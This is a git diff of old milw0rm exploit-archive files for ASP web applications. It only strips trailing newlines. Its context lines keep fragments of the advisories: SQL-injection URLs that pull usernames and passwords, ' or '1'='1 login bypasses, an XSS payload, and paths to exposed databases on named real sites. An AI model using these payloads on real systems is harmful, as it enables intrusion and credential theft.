milw0rm.com [2008-12-07] \ No newline at end of file diff --git a/platforms/asp/webapps/7378.txt b/platforms/asp/webapps/7378.txt index ad0afab73..5b58e4f2a 100755 --- a/platforms/asp/webapps/7378.txt +++ b/platforms/asp/webapps/7378.txt @@ -32,4 +32,4 @@ http://[website]/[script]/treplies.asp?message=20814+union+select+1,2,3,4,5,6,7, [peace xD] -# milw0rm.com [2008-12-07] +# milw0rm.com [2008-12-07] \ No newline at end of file diff --git a/platforms/asp/webapps/7390.txt b/platforms/asp/webapps/7390.txt index 00f00c459..4e3a9d2fb 100755 --- a/platforms/asp/webapps/7390.txt +++ b/platforms/asp/webapps/7390.txt @@ -27,4 +27,4 @@ passwd: ' or ' [~] [~]---------------------------------------------------------------------- -# milw0rm.com [2008-12-09] +# milw0rm.com [2008-12-09] \ No newline at end of file diff --git a/platforms/asp/webapps/7391.txt b/platforms/asp/webapps/7391.txt index 9000d7a83..15a0ecbf7 100755 --- a/platforms/asp/webapps/7391.txt +++ b/platforms/asp/webapps/7391.txt @@ -27,4 +27,4 @@ password : ' or '1'='1 ########################################################################### -# milw0rm.com [2008-12-09] +# milw0rm.com [2008-12-09] \ No newline at end of file diff --git a/platforms/asp/webapps/7398.txt b/platforms/asp/webapps/7398.txt index 4e1c3d246..3fe626dd8 100755 --- a/platforms/asp/webapps/7398.txt +++ b/platforms/asp/webapps/7398.txt @@ -33,4 +33,4 @@ http://www.melink.com/PostCards/sendcard.cfm?cid=0+union+SELECT%20null,null,user ########################################################################### -# milw0rm.com [2008-12-09] +# milw0rm.com [2008-12-09] \ No newline at end of file diff --git a/platforms/asp/webapps/7412.txt b/platforms/asp/webapps/7412.txt index 3a55c01a0..a8a83ebaf 100755 --- a/platforms/asp/webapps/7412.txt +++ b/platforms/asp/webapps/7412.txt @@ -27,4 +27,4 @@ http://www.cfshopkart.com/demos/cfshopkart522/databases/cfshopkart52.mdb ########################################################################### -# milw0rm.com [2008-12-10] +# milw0rm.com [2008-12-10] \ No newline at end of file diff --git a/platforms/asp/webapps/7413.pl b/platforms/asp/webapps/7413.pl index 64fdaf28b..7e411f87d 100755 --- a/platforms/asp/webapps/7413.pl +++ b/platforms/asp/webapps/7413.pl @@ -41,4 +41,4 @@ if ($response->is_success) { } else { print " Error, ".$response->status_line."\n\n"; } -# milw0rm.com [2008-12-10] +# milw0rm.com [2008-12-10] \ No newline at end of file diff --git a/platforms/asp/webapps/7414.txt b/platforms/asp/webapps/7414.txt index 2b77a6086..14c6f77b2 100755 --- a/platforms/asp/webapps/7414.txt +++ b/platforms/asp/webapps/7414.txt @@ -26,4 +26,4 @@ http://www.cfwebsite.com/forummessages.cfm?topicnbr=4&categorynbr=2%20and%20subs ########################################################################### -# milw0rm.com [2008-12-10] +# milw0rm.com [2008-12-10] \ No newline at end of file diff --git a/platforms/asp/webapps/7415.txt b/platforms/asp/webapps/7415.txt index 630001bc6..9ce003454 100755 --- a/platforms/asp/webapps/7415.txt +++ b/platforms/asp/webapps/7415.txt @@ -24,4 +24,4 @@ http://www.cfmblog.com/index.cfm?categorynbr=2+and%20substring(@@version,1,1)=5 ########################################################################### -# milw0rm.com [2008-12-10] +# milw0rm.com [2008-12-10] \ No newline at end of file diff --git a/platforms/asp/webapps/7416.txt b/platforms/asp/webapps/7416.txt index 96c8210ce..3cc5699e4 100755 --- a/platforms/asp/webapps/7416.txt +++ b/platforms/asp/webapps/7416.txt @@ -24,4 +24,4 @@ http://www.cfmsource.com/forums/htdocs/forummessages.cfm?topicnbr=2&categorynbr= ########################################################################### -# milw0rm.com [2008-12-10] +# milw0rm.com [2008-12-10] \ No newline at end of file diff --git a/platforms/asp/webapps/7419.txt b/platforms/asp/webapps/7419.txt index 9b454271d..1f9df39fb 100755 --- a/platforms/asp/webapps/7419.txt +++ b/platforms/asp/webapps/7419.txt @@ -55,4 +55,4 @@ http://localhost/script/databases/evcal97.mdb = [AttaCk Is CompLet] = ___________________________________________________________________________________________________________________________________________________________ -# milw0rm.com [2008-12-11] +# milw0rm.com [2008-12-11] \ No newline at end of file diff --git a/platforms/asp/webapps/7420.txt b/platforms/asp/webapps/7420.txt index d1165be0f..666bb8b8e 100755 --- a/platforms/asp/webapps/7420.txt +++ b/platforms/asp/webapps/7420.txt @@ -22,4 +22,4 @@ Thanks: Cyber-Warrior.Org **************************************************************************************** -# milw0rm.com [2008-12-11] +# milw0rm.com [2008-12-11] \ No newline at end of file diff --git a/platforms/asp/webapps/7423.txt b/platforms/asp/webapps/7423.txt index 0912c1d8d..702f7678c 100755 --- a/platforms/asp/webapps/7423.txt +++ b/platforms/asp/webapps/7423.txt @@ -39,4 +39,4 @@ [~]-------------------------------------------------------------------------------- -# milw0rm.com [2008-12-11] +# milw0rm.com [2008-12-11] \ No newline at end of file diff --git a/platforms/asp/webapps/7424.txt b/platforms/asp/webapps/7424.txt index 5c56c82bb..eda069309 100755 --- a/platforms/asp/webapps/7424.txt +++ b/platforms/asp/webapps/7424.txt @@ -39,4 +39,4 @@ [~]-------------------------------------------------------------------------------- -# milw0rm.com [2008-12-11] +# milw0rm.com [2008-12-11] \ No newline at end of file diff --git a/platforms/asp/webapps/7425.txt b/platforms/asp/webapps/7425.txt index 05903757d..83144dc72 100755 --- a/platforms/asp/webapps/7425.txt +++ b/platforms/asp/webapps/7425.txt @@ -39,4 +39,4 @@ [~]-------------------------------------------------------------------------------- -# milw0rm.com [2008-12-11] +# milw0rm.com [2008-12-11] \ No newline at end of file diff --git a/platforms/asp/webapps/7427.txt b/platforms/asp/webapps/7427.txt index cb5b8b706..418a59215 100755 --- a/platforms/asp/webapps/7427.txt +++ b/platforms/asp/webapps/7427.txt @@ -24,4 +24,4 @@ http://thenetguys.us/ASPired2/Poll/ASPired2poll.mdb ########################################################################### -# milw0rm.com [2008-12-11] +# milw0rm.com [2008-12-11] \ No newline at end of file diff --git a/platforms/asp/webapps/7428.txt b/platforms/asp/webapps/7428.txt index 62102aa33..3cf57b354 100755 --- a/platforms/asp/webapps/7428.txt +++ b/platforms/asp/webapps/7428.txt @@ -24,4 +24,4 @@ http://thenetguys.us/ASPired2/Protect/ASPired2Protect.mdb ########################################################################### -# milw0rm.com [2008-12-12] +# milw0rm.com [2008-12-12] \ No newline at end of file diff --git a/platforms/asp/webapps/7429.txt b/platforms/asp/webapps/7429.txt index 1f2e83aa1..c11e41bde 100755 --- a/platforms/asp/webapps/7429.txt +++ b/platforms/asp/webapps/7429.txt @@ -23,4 +23,4 @@ # Site : Http://IRCRASH.COM # ###################################### TNX GOD ###################################### -# milw0rm.com [2008-12-12] +# milw0rm.com [2008-12-12] \ No newline at end of file diff --git a/platforms/asp/webapps/7436.txt b/platforms/asp/webapps/7436.txt index a81ee4b3e..4fa3333af 100755 --- a/platforms/asp/webapps/7436.txt +++ b/platforms/asp/webapps/7436.txt @@ -16,4 +16,4 @@ http://site.com/[Path]/admin/blog_comments.asp?BlogID='[SQL] Victem : http://thenetguys.us/ASPired2/Blog/index.asp -# milw0rm.com [2008-12-12] +# milw0rm.com [2008-12-12] \ No newline at end of file diff --git a/platforms/asp/webapps/7438.txt b/platforms/asp/webapps/7438.txt index 4bdbdf163..e9218d00a 100755 --- a/platforms/asp/webapps/7438.txt +++ b/platforms/asp/webapps/7438.txt @@ -25,4 +25,4 @@ Dork : powered by vpasp v 6.50 V4-team ,, S.V.T ,, Reno ,, Ghost Hacker .. -# milw0rm.com [2008-12-12] +# milw0rm.com [2008-12-12] \ No newline at end of file diff --git a/platforms/asp/webapps/7440.txt b/platforms/asp/webapps/7440.txt index 6ee1baa8d..4e874a4ce 100755 --- a/platforms/asp/webapps/7440.txt +++ b/platforms/asp/webapps/7440.txt @@ -55,4 +55,4 @@ http://localhost/script/databases/makered97.mdb = [AttaCk Is CompLet] = ___________________________________________________________________________________________________________________________________________________________ -# milw0rm.com [2008-12-12] +# milw0rm.com [2008-12-12] \ No newline at end of file diff --git a/platforms/asp/webapps/7445.txt b/platforms/asp/webapps/7445.txt index 45c722842..6fbfb76cb 100755 --- a/platforms/asp/webapps/7445.txt +++ b/platforms/asp/webapps/7445.txt @@ -12,4 +12,4 @@ http://site.com/[Path]/_private/discussion.mdb --------------------------------- -# milw0rm.com [2008-12-14] +# milw0rm.com [2008-12-14] \ No newline at end of file diff --git a/platforms/asp/webapps/7446.txt b/platforms/asp/webapps/7446.txt index 689ed7f0a..dce80d14b 100755 --- a/platforms/asp/webapps/7446.txt +++ b/platforms/asp/webapps/7446.txt @@ -13,4 +13,4 @@ http://site.com/[Path]/admin/quote.mdb Victem : http://thenetguys.us/ASPired2/Quote/index.asp -# milw0rm.com [2008-12-14] +# milw0rm.com [2008-12-14] \ No newline at end of file diff --git a/platforms/asp/webapps/7447.txt b/platforms/asp/webapps/7447.txt index f8c64a882..8ad85c6ca 100755 --- a/platforms/asp/webapps/7447.txt +++ b/platforms/asp/webapps/7447.txt @@ -15,4 +15,4 @@ pass: ' or '1'='1 Victem : http://asp-dev.com/message -# milw0rm.com [2008-12-14] +# milw0rm.com [2008-12-14] \ No newline at end of file diff --git a/platforms/asp/webapps/7450.txt b/platforms/asp/webapps/7450.txt index 60ba9a5a9..3c3a57aa3 100755 --- a/platforms/asp/webapps/7450.txt +++ b/platforms/asp/webapps/7450.txt @@ -16,4 +16,4 @@ # All Members Real-h.com and v4-team.net , All My Friends # #################################################################################################### -# milw0rm.com [2008-12-14] +# milw0rm.com [2008-12-14] \ No newline at end of file diff --git a/platforms/asp/webapps/7462.txt b/platforms/asp/webapps/7462.txt index 5d9027f46..2ced06502 100755 --- a/platforms/asp/webapps/7462.txt +++ b/platforms/asp/webapps/7462.txt @@ -28,4 +28,4 @@ http://www.aspsiteware.com/home2/home2/type2.asp?iType=0+union+select+1,2,3,4,5, ########################################################################### -# milw0rm.com [2008-12-14] +# milw0rm.com [2008-12-14] \ No newline at end of file diff --git a/platforms/asp/webapps/7464.txt b/platforms/asp/webapps/7464.txt index b780b045e..6fa88574d 100755 --- a/platforms/asp/webapps/7464.txt +++ b/platforms/asp/webapps/7464.txt @@ -27,4 +27,4 @@ http://www.aspsiteware.com/realty2/realty2/type.asp?iType=0+union+select+1,2,3,4 ########################################################################### -# milw0rm.com [2008-12-14] +# milw0rm.com [2008-12-14] \ No newline at end of file diff --git a/platforms/asp/webapps/7466.txt b/platforms/asp/webapps/7466.txt index 9f3fade99..6f74cd2a0 100755 --- a/platforms/asp/webapps/7466.txt +++ b/platforms/asp/webapps/7466.txt @@ -10,4 +10,4 @@ < > < > ============= -# milw0rm.com [2008-12-15] +# milw0rm.com [2008-12-15] \ No newline at end of file diff --git a/platforms/asp/webapps/7468.txt b/platforms/asp/webapps/7468.txt index cbb3ddc0c..478712e96 100755 --- a/platforms/asp/webapps/7468.txt +++ b/platforms/asp/webapps/7468.txt @@ -11,4 +11,4 @@ http://site.com/[Path]/CAdirectory/_private/CADirectory.mdb --------------------------------- -# milw0rm.com [2008-12-15] +# milw0rm.com [2008-12-15] \ No newline at end of file diff --git a/platforms/asp/webapps/7469.txt b/platforms/asp/webapps/7469.txt index f7ce23c38..8b8acebee 100755 --- a/platforms/asp/webapps/7469.txt +++ b/platforms/asp/webapps/7469.txt @@ -11,4 +11,4 @@ http://site.com/[Path]/CAFFAPage/_private/CAFFAPage.mdb --------------------------------- -# milw0rm.com [2008-12-15] +# milw0rm.com [2008-12-15] \ No newline at end of file diff --git a/platforms/asp/webapps/7470.txt b/platforms/asp/webapps/7470.txt index 570e49193..4da83f288 100755 --- a/platforms/asp/webapps/7470.txt +++ b/platforms/asp/webapps/7470.txt @@ -11,4 +11,4 @@ http://site.com/[Path]/CAFreeWallpaper/_private/CAFreeWallpaper.mdb --------------------------------- -# milw0rm.com [2008-12-15] +# milw0rm.com [2008-12-15] \ No newline at end of file diff --git a/platforms/asp/webapps/7471.txt b/platforms/asp/webapps/7471.txt index d2b082a73..7d93426f3 100755 --- a/platforms/asp/webapps/7471.txt +++ b/platforms/asp/webapps/7471.txt @@ -11,4 +11,4 @@ http://site.com/[Path]/CAArticles/_private/CAArticles.mdb --------------------------------- -# milw0rm.com [2008-12-15] +# milw0rm.com [2008-12-15] \ No newline at end of file diff --git a/platforms/asp/webapps/7472.txt b/platforms/asp/webapps/7472.txt index b01496f1e..58a02d436 100755 --- a/platforms/asp/webapps/7472.txt +++ b/platforms/asp/webapps/7472.txt @@ -11,4 +11,4 @@ http://site.com/[Path]/_private/CARateMySite.mdb --------------------------------- -# milw0rm.com [2008-12-15] +# milw0rm.com [2008-12-15] \ No newline at end of file diff --git a/platforms/asp/webapps/7484.txt b/platforms/asp/webapps/7484.txt index bcb313fd5..9408fa39c 100755 --- a/platforms/asp/webapps/7484.txt +++ b/platforms/asp/webapps/7484.txt @@ -41,4 +41,4 @@ PASSWORD : ' or '1'='1 ########################################################################### -# milw0rm.com [2008-12-15] +# milw0rm.com [2008-12-15] \ No newline at end of file diff --git a/platforms/asp/webapps/7485.txt b/platforms/asp/webapps/7485.txt index 79e26d55d..7241fce55 100755 --- a/platforms/asp/webapps/7485.txt +++ b/platforms/asp/webapps/7485.txt @@ -42,4 +42,4 @@ http://icash.ch/ClickAndEmailDEMO/admin_dblayers.asp?action=update&tablename=%22 ########################################################################### -# milw0rm.com [2008-12-15] +# milw0rm.com [2008-12-15] \ No newline at end of file diff --git a/platforms/asp/webapps/7486.txt b/platforms/asp/webapps/7486.txt index 139195eff..7a7e72487 100755 --- a/platforms/asp/webapps/7486.txt +++ b/platforms/asp/webapps/7486.txt @@ -43,4 +43,4 @@ http://www.icash.ch/index.html?ClickAndRank/user.asp?action=%22%3E%3Cscript%3Eal ########################################################################### -# milw0rm.com [2008-12-15] +# milw0rm.com [2008-12-15] \ No newline at end of file diff --git a/platforms/asp/webapps/7488.txt b/platforms/asp/webapps/7488.txt index eb439c2c8..57d3cae63 100755 --- a/platforms/asp/webapps/7488.txt +++ b/platforms/asp/webapps/7488.txt @@ -10,4 +10,4 @@ < > < > ============= -# milw0rm.com [2008-12-16] +# milw0rm.com [2008-12-16] \ No newline at end of file diff --git a/platforms/asp/webapps/7491.txt b/platforms/asp/webapps/7491.txt index a31c1db3d..6ca1cb7a7 100755 --- a/platforms/asp/webapps/7491.txt +++ b/platforms/asp/webapps/7491.txt @@ -14,4 +14,4 @@ Live Demo http://www.nukedit.com/database/dbsite.mdb -# milw0rm.com [2008-12-16] +# milw0rm.com [2008-12-16] \ No newline at end of file diff --git a/platforms/asp/webapps/7495.txt b/platforms/asp/webapps/7495.txt index 8534680ba..9ff0c9a89 100755 --- a/platforms/asp/webapps/7495.txt +++ b/platforms/asp/webapps/7495.txt @@ -29,4 +29,4 @@ http://www.gazatem.com/demos/gnews/authors.asp?authorID=convert(int,(select+top+ ########################################################################### -# milw0rm.com [2008-12-16] +# milw0rm.com [2008-12-16] \ No newline at end of file diff --git a/platforms/asp/webapps/7499.txt b/platforms/asp/webapps/7499.txt index 8acd7ce0a..4d62ab74a 100755 --- a/platforms/asp/webapps/7499.txt +++ b/platforms/asp/webapps/7499.txt @@ -22,4 +22,4 @@ BP Blog V6.0 & V7.0 & V8.0 & V9.0 Database Disclosure Vulnerability ### {G} V4-team <--> Mr.SaFa7 & Ghost Hacker ,,,, S.V.T <--> Reno :D -# milw0rm.com [2008-12-17] +# milw0rm.com [2008-12-17] \ No newline at end of file diff --git a/platforms/asp/webapps/7508.txt b/platforms/asp/webapps/7508.txt index a7c85a862..bff586d82 100755 --- a/platforms/asp/webapps/7508.txt +++ b/platforms/asp/webapps/7508.txt @@ -24,4 +24,4 @@ http://cupofcoffee.quickersite.com/db/QuickerSite.mdb ########################################################################### -# milw0rm.com [2008-12-17] +# milw0rm.com [2008-12-17] \ No newline at end of file diff --git a/platforms/asp/webapps/7534.txt b/platforms/asp/webapps/7534.txt index fe9fe6baa..3912eefe8 100755 --- a/platforms/asp/webapps/7534.txt +++ b/platforms/asp/webapps/7534.txt @@ -17,4 +17,4 @@ http://www.navigatorcentrum.nu/ung/guestbook/guestbook.mdb Or http://www.devalk.be/guestbook/guestbook.mdb -# milw0rm.com [2008-12-21] +# milw0rm.com [2008-12-21] \ No newline at end of file diff --git a/platforms/asp/webapps/7599.txt b/platforms/asp/webapps/7599.txt index 5d6e0da43..a0aa6d729 100755 --- a/platforms/asp/webapps/7599.txt +++ b/platforms/asp/webapps/7599.txt @@ -23,4 +23,4 @@ http://target.com/data/8690BAK.mdb #################################### -# milw0rm.com [2008-12-28] +# milw0rm.com [2008-12-28] \ No newline at end of file diff --git a/platforms/asp/webapps/7609.txt b/platforms/asp/webapps/7609.txt index 640a6f375..fdbb0a1fa 100755 --- a/platforms/asp/webapps/7609.txt +++ b/platforms/asp/webapps/7609.txt @@ -19,4 +19,4 @@ http://localhost/shopmall/shpdetails.asp?ID=1 union select 0,1,2,username,passwo http://localhost/shopmall/admlogin.asp? -# milw0rm.com [2008-12-29] +# milw0rm.com [2008-12-29] \ No newline at end of file diff --git a/platforms/asp/webapps/7610.txt b/platforms/asp/webapps/7610.txt index 022f19e39..2e0fc4dca 100755 --- a/platforms/asp/webapps/7610.txt +++ b/platforms/asp/webapps/7610.txt @@ -20,4 +20,4 @@ http://localhost/faculty/deptdisplay.asp?ID=1 union select 0,1,2,3,Username,user http://localhost/faculty/login.asp -# milw0rm.com [2008-12-29] +# milw0rm.com [2008-12-29] \ No newline at end of file diff --git a/platforms/asp/webapps/7613.txt b/platforms/asp/webapps/7613.txt index d491c3dbb..2d09577ef 100755 --- a/platforms/asp/webapps/7613.txt +++ b/platforms/asp/webapps/7613.txt @@ -30,4 +30,4 @@ I'll Be A C I D A L !!! --==+ Sepcity Classified Remote SQL Injection Vulnerability +==-- --==+================================================================================+==-- -# milw0rm.com [2008-12-29] +# milw0rm.com [2008-12-29] \ No newline at end of file diff --git a/platforms/asp/webapps/7627.txt b/platforms/asp/webapps/7627.txt index 141fac2b3..cf01cf812 100755 --- a/platforms/asp/webapps/7627.txt +++ b/platforms/asp/webapps/7627.txt @@ -25,4 +25,4 @@ http://www.jayeshp.com/Pixel8/Demo/Files/Photo.asp?Index=1&NEXTPID=1149&OSet=0&U ########################################################################### -# milw0rm.com [2008-12-30] +# milw0rm.com [2008-12-30] \ No newline at end of file diff --git a/platforms/asp/webapps/7665.txt b/platforms/asp/webapps/7665.txt index ac8114aef..d9cde9042 100755 --- a/platforms/asp/webapps/7665.txt +++ b/platforms/asp/webapps/7665.txt @@ -64,4 +64,4 @@ http://www.siteadi.com/[PATH]/Pack/bad/acc.mdb # milw0rm.com / Str0ke -# milw0rm.com [2009-01-05] +# milw0rm.com [2009-01-05] \ No newline at end of file diff --git a/platforms/asp/webapps/7666.txt b/platforms/asp/webapps/7666.txt index 7f4684b74..247af9bd2 100755 --- a/platforms/asp/webapps/7666.txt +++ b/platforms/asp/webapps/7666.txt @@ -23,4 +23,4 @@ Ayemsis Emlak Pro(Auth Bypass) SQL Injection Vulnerability # milw0rm.com ############################################# -# milw0rm.com [2009-01-05] +# milw0rm.com [2009-01-05] \ No newline at end of file diff --git a/platforms/asp/webapps/7736.htm b/platforms/asp/webapps/7736.htm index ae8f4e755..3ed570342 100755 --- a/platforms/asp/webapps/7736.htm +++ b/platforms/asp/webapps/7736.htm @@ -124,4 +124,4 @@ KAHROLSUN ISRAEL -# milw0rm.com [2009-01-12] +# milw0rm.com [2009-01-12] \ No newline at end of file diff --git a/platforms/asp/webapps/7741.txt b/platforms/asp/webapps/7741.txt index 0b9587fe0..c501b3dfc 100755 --- a/platforms/asp/webapps/7741.txt +++ b/platforms/asp/webapps/7741.txt @@ -64,4 +64,4 @@ Links Manager 1.1 http://localhost/databases/LinksManager.md Thanx To : Hussin X , Jiko , The_5p3ctrum , BayHay , staCk ...All Mgharba -# milw0rm.com [2009-01-12] +# milw0rm.com [2009-01-12] \ No newline at end of file diff --git a/platforms/asp/webapps/7744.txt b/platforms/asp/webapps/7744.txt index 665a00536..3e6fa618c 100755 --- a/platforms/asp/webapps/7744.txt +++ b/platforms/asp/webapps/7744.txt @@ -34,4 +34,4 @@ Author: Moudi ########################################################################### -# milw0rm.com [2009-01-13] +# milw0rm.com [2009-01-13] \ No newline at end of file diff --git a/platforms/asp/webapps/7752.txt b/platforms/asp/webapps/7752.txt index edab60642..7c2a3ab88 100755 --- a/platforms/asp/webapps/7752.txt +++ b/platforms/asp/webapps/7752.txt @@ -23,4 +23,4 @@ Edit -> http://[target]/[path]//dmin/NewsManager/CategoryManager/update_cate Update Category Name : ) -# milw0rm.com [2009-01-13] +# milw0rm.com [2009-01-13] \ No newline at end of file diff --git a/platforms/asp/webapps/7754.txt b/platforms/asp/webapps/7754.txt index fd53722d6..3bbde4f82 100755 --- a/platforms/asp/webapps/7754.txt +++ b/platforms/asp/webapps/7754.txt @@ -27,4 +27,4 @@ Edit -> http://[target]/[path]//admin/AccountListManager/add_category.asp :) -# milw0rm.com [2009-01-13] +# milw0rm.com [2009-01-13] \ No newline at end of file diff --git a/platforms/asp/webapps/7761.txt b/platforms/asp/webapps/7761.txt index 55e76c90c..d4f165d21 100755 --- a/platforms/asp/webapps/7761.txt +++ b/platforms/asp/webapps/7761.txt @@ -34,4 +34,4 @@ Many Greetings to: All Greek Hackers. ************************* -# milw0rm.com [2009-01-14] +# milw0rm.com [2009-01-14] \ No newline at end of file diff --git a/platforms/asp/webapps/7766.txt b/platforms/asp/webapps/7766.txt index 83024091a..57f7606c3 100755 --- a/platforms/asp/webapps/7766.txt +++ b/platforms/asp/webapps/7766.txt @@ -28,4 +28,4 @@ Edit -> http://[target]/[path]//admin/CatalogManager/CategoryManager/list.as :) -# milw0rm.com [2009-01-14] +# milw0rm.com [2009-01-14] \ No newline at end of file diff --git a/platforms/asp/webapps/7767.txt b/platforms/asp/webapps/7767.txt index 6c2968ad0..e59f96de0 100755 --- a/platforms/asp/webapps/7767.txt +++ b/platforms/asp/webapps/7767.txt @@ -39,4 +39,4 @@ http://[target]/[path]//admin/ClassifiedListingsManager/manage.asp # Im not Hacker! -# milw0rm.com [2009-01-14] +# milw0rm.com [2009-01-14] \ No newline at end of file diff --git a/platforms/asp/webapps/7768.txt b/platforms/asp/webapps/7768.txt index 4b1224baf..584e96096 100755 --- a/platforms/asp/webapps/7768.txt +++ b/platforms/asp/webapps/7768.txt @@ -27,4 +27,4 @@ Edit -> http://[target]/[path]//admin/ContactUsManager/add_category.asp :) -# milw0rm.com [2009-01-14] +# milw0rm.com [2009-01-14] \ No newline at end of file diff --git a/platforms/asp/webapps/7769.txt b/platforms/asp/webapps/7769.txt index 795801029..bd8dce03b 100755 --- a/platforms/asp/webapps/7769.txt +++ b/platforms/asp/webapps/7769.txt @@ -27,4 +27,4 @@ Edit -> http://[target]/[path]//admin/DocumentLibraryManager/add_category.as :) -# milw0rm.com [2009-01-14] +# milw0rm.com [2009-01-14] \ No newline at end of file diff --git a/platforms/asp/webapps/7770.txt b/platforms/asp/webapps/7770.txt index db1c7356e..51ae5c4ef 100755 --- a/platforms/asp/webapps/7770.txt +++ b/platforms/asp/webapps/7770.txt @@ -27,4 +27,4 @@ Edit -> http://[target]/[path]//admin/FaqsManager/add_category.asp :) -# milw0rm.com [2009-01-14] +# milw0rm.com [2009-01-14] \ No newline at end of file diff --git a/platforms/asp/webapps/7771.txt b/platforms/asp/webapps/7771.txt index 10ab7673e..22001208f 100755 --- a/platforms/asp/webapps/7771.txt +++ b/platforms/asp/webapps/7771.txt @@ -27,4 +27,4 @@ Edit -> http://[target]/[path]//admin/JobListingManager/CategoryManager/list :) -# milw0rm.com [2009-01-14] +# milw0rm.com [2009-01-14] \ No newline at end of file diff --git a/platforms/asp/webapps/7772.txt b/platforms/asp/webapps/7772.txt index b4c2ca7dc..859eedfcc 100755 --- a/platforms/asp/webapps/7772.txt +++ b/platforms/asp/webapps/7772.txt @@ -26,4 +26,4 @@ Edit -> http://[target]/[path]//admin/LinksManager/add_category.asp :) -# milw0rm.com [2009-01-14] +# milw0rm.com [2009-01-14] \ No newline at end of file diff --git a/platforms/asp/webapps/7773.txt b/platforms/asp/webapps/7773.txt index 7655bd5e5..4819345f2 100755 --- a/platforms/asp/webapps/7773.txt +++ b/platforms/asp/webapps/7773.txt @@ -42,4 +42,4 @@ Admin Login-> # Im not Hacker! -# milw0rm.com [2009-01-14] +# milw0rm.com [2009-01-14] \ No newline at end of file diff --git a/platforms/asp/webapps/7774.txt b/platforms/asp/webapps/7774.txt index 15c8be424..23b1e3393 100755 --- a/platforms/asp/webapps/7774.txt +++ b/platforms/asp/webapps/7774.txt @@ -42,4 +42,4 @@ Admin Login-> # Im not Hacker! -# milw0rm.com [2009-01-14] +# milw0rm.com [2009-01-14] \ No newline at end of file diff --git a/platforms/asp/webapps/7782.txt b/platforms/asp/webapps/7782.txt index 6fce947bf..a0583bbe5 100755 --- a/platforms/asp/webapps/7782.txt +++ b/platforms/asp/webapps/7782.txt @@ -27,4 +27,4 @@ Edit -> http://[target]/[path]//admin/PayPalStoreManager/CategoryManager/lis :) -# milw0rm.com [2009-01-14] +# milw0rm.com [2009-01-14] \ No newline at end of file diff --git a/platforms/asp/webapps/7783.txt b/platforms/asp/webapps/7783.txt index 435a5aceb..66e4a9230 100755 --- a/platforms/asp/webapps/7783.txt +++ b/platforms/asp/webapps/7783.txt @@ -27,4 +27,4 @@ Edit -> http://[target]/[path]//admin/PhotoGalleryManager/add_category.asp :) -# milw0rm.com [2009-01-14] +# milw0rm.com [2009-01-14] \ No newline at end of file diff --git a/platforms/asp/webapps/7784.txt b/platforms/asp/webapps/7784.txt index 67d0161c3..ee2577f3b 100755 --- a/platforms/asp/webapps/7784.txt +++ b/platforms/asp/webapps/7784.txt @@ -26,4 +26,4 @@ Edit -> http://[target]/[path]//admin/RegistrationManager/add_category.asp :) -# milw0rm.com [2009-01-14] +# milw0rm.com [2009-01-14] \ No newline at end of file diff --git a/platforms/asp/webapps/7788.txt b/platforms/asp/webapps/7788.txt index a047e507b..829794e41 100755 --- a/platforms/asp/webapps/7788.txt +++ b/platforms/asp/webapps/7788.txt @@ -17,4 +17,4 @@ You Find -> http://[target]/[path]//applications/BillboardManager/ Edit -> http://www.demo.dmxready.com/admin/BillboardManager/add_category.asp -# milw0rm.com [2009-01-14] +# milw0rm.com [2009-01-14] \ No newline at end of file diff --git a/platforms/asp/webapps/7789.txt b/platforms/asp/webapps/7789.txt index 70528be0e..c6e20a1e6 100755 --- a/platforms/asp/webapps/7789.txt +++ b/platforms/asp/webapps/7789.txt @@ -21,4 +21,4 @@ # Im not Hacker! -# milw0rm.com [2009-01-14] +# milw0rm.com [2009-01-14] \ No newline at end of file diff --git a/platforms/asp/webapps/7791.txt b/platforms/asp/webapps/7791.txt index 66e5e31bc..619723b3d 100755 --- a/platforms/asp/webapps/7791.txt +++ b/platforms/asp/webapps/7791.txt @@ -24,4 +24,4 @@ Edit -> http://[target]/[path]//admin/BillboardManager/upload_document.asp?I :) -# milw0rm.com [2009-01-15] +# milw0rm.com [2009-01-15] \ No newline at end of file diff --git a/platforms/asp/webapps/7800.txt b/platforms/asp/webapps/7800.txt index a08e5b0a7..83e8844d7 100755 --- a/platforms/asp/webapps/7800.txt +++ b/platforms/asp/webapps/7800.txt @@ -27,4 +27,4 @@ Onun derdini gördüm, derdime İMRENDİM... ---------- FilistiN -# milw0rm.com [2009-01-16] +# milw0rm.com [2009-01-16] \ No newline at end of file diff --git a/platforms/asp/webapps/7801.txt b/platforms/asp/webapps/7801.txt index cade5ad3a..9d2ecbea9 100755 --- a/platforms/asp/webapps/7801.txt +++ b/platforms/asp/webapps/7801.txt @@ -27,4 +27,4 @@ Onun derdini gördüm, derdime İMRENDİM... ---------- FilistiN -# milw0rm.com [2009-01-16] +# milw0rm.com [2009-01-16] \ No newline at end of file diff --git a/platforms/asp/webapps/7802.txt b/platforms/asp/webapps/7802.txt index 803ad0139..ef3fdd985 100755 --- a/platforms/asp/webapps/7802.txt +++ b/platforms/asp/webapps/7802.txt @@ -29,4 +29,4 @@ Onun derdini gördüm, derdime İMRENDİM... ---------- FilistiN -# milw0rm.com [2009-01-16] +# milw0rm.com [2009-01-16] \ No newline at end of file diff --git a/platforms/asp/webapps/7803.txt b/platforms/asp/webapps/7803.txt index d56e1391d..b0119e6a7 100755 --- a/platforms/asp/webapps/7803.txt +++ b/platforms/asp/webapps/7803.txt @@ -32,4 +32,4 @@ Onun derdini gördüm, derdime İMRENDİM... ---------- FilistiN -# milw0rm.com [2009-01-16] +# milw0rm.com [2009-01-16] \ No newline at end of file diff --git a/platforms/asp/webapps/7807.txt b/platforms/asp/webapps/7807.txt index 180444c30..540dc8534 100755 --- a/platforms/asp/webapps/7807.txt +++ b/platforms/asp/webapps/7807.txt @@ -30,4 +30,4 @@ http://www.warrenstudios.com/actioncalendar/admin.asp ---------------------------------------------------------- -# milw0rm.com [2009-01-16] +# milw0rm.com [2009-01-16] \ No newline at end of file diff --git a/platforms/asp/webapps/7816.txt b/platforms/asp/webapps/7816.txt index 2afd1ea4b..f79dc8901 100755 --- a/platforms/asp/webapps/7816.txt +++ b/platforms/asp/webapps/7816.txt @@ -35,4 +35,4 @@ Author: Moudi ########################################################################### -# milw0rm.com [2009-01-18] +# milw0rm.com [2009-01-18] \ No newline at end of file diff --git a/platforms/asp/webapps/7850.txt b/platforms/asp/webapps/7850.txt index 2aaab29fa..8ed0dd108 100755 --- a/platforms/asp/webapps/7850.txt +++ b/platforms/asp/webapps/7850.txt @@ -20,4 +20,4 @@ # # ###################################### TNX GOD ###################################### -# milw0rm.com [2009-01-22] +# milw0rm.com [2009-01-22] \ No newline at end of file diff --git a/platforms/asp/webapps/7861.txt b/platforms/asp/webapps/7861.txt index 